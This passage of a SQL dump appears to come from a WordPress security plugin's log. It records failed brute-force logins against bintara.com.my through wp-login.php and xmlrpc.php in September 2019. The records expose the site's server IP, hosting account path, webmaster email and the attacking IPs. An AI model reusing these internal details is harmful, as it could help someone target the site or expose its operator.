:\"REQUEST_TIME\";s:10:\"1568583494\";}}','notice','2019-09-15 21:38:16','2019-09-15 21:38:15',17739424,19230712,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(23942,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"52658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6vSeesTgPVjZVPWmsrqQAAAMc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568583498.0258\";s:12:\"REQUEST_TIME\";s:10:\"1568583498\";}}','notice','2019-09-15 21:38:19','2019-09-15 21:38:18',18253856,19553688,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(23943,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"54694\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6x7d7nxogXZmwWoWHXkQAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568584173.417\";s:12:\"REQUEST_TIME\";s:10:\"1568584173\";}}','notice','2019-09-15 21:49:34','2019-09-15 21:49:33',17739280,19230248,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(23944,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"55186\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6x8N7nxogXZmwWoWHXlgAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568584176.2809\";s:12:\"REQUEST_TIME\";s:10:\"1568584176\";}}','notice','2019-09-15 21:49:37','2019-09-15 21:49:36',18253128,19553000,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(23945,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"45062\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX63eN7nxogXZmwWoWHcsAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568585592.8901\";s:12:\"REQUEST_TIME\";s:10:\"1568585592\";}}','notice','2019-09-15 22:13:14','2019-09-15 22:13:13',17739616,19229952,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(23946,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"45498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX63e71rBLb0GV3O7mTDcwAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568585595.6625\";s:12:\"REQUEST_TIME\";s:10:\"1568585595\";}}','notice','2019-09-15 22:13:17','2019-09-15 22:13:16',18252600,19552544,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(23947,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"40724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX66XN7nxogXZmwWoWHfFwAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568586332.4716\";s:12:\"REQUEST_TIME\";s:10:\"1568586332\";}}','notice','2019-09-15 22:25:33','2019-09-15 22:25:32',17737632,19228560,'https://bintara.com.my/wp-login.php',1,0,'91.191.173.134'),(23948,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"41046\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX66X97nxogXZmwWoWHfHAAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568586335.6716\";s:12:\"REQUEST_TIME\";s:10:\"1568586335\";}}','notice','2019-09-15 22:25:37','2019-09-15 22:25:36',18256640,19556600,'https://bintara.com.my/xmlrpc.php',1,0,'91.191.173.134'),(23949,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"39980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX68797nxogXZmwWoWHhcQAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568586991.894\";s:12:\"REQUEST_TIME\";s:10:\"1568586991\";}}','notice','2019-09-15 22:36:33','2019-09-15 22:36:32',17737872,19228648,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23950,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"40426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX688t7nxogXZmwWoWHhdQAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568586995.0191\";s:12:\"REQUEST_TIME\";s:10:\"1568586995\";}}','notice','2019-09-15 22:36:36','2019-09-15 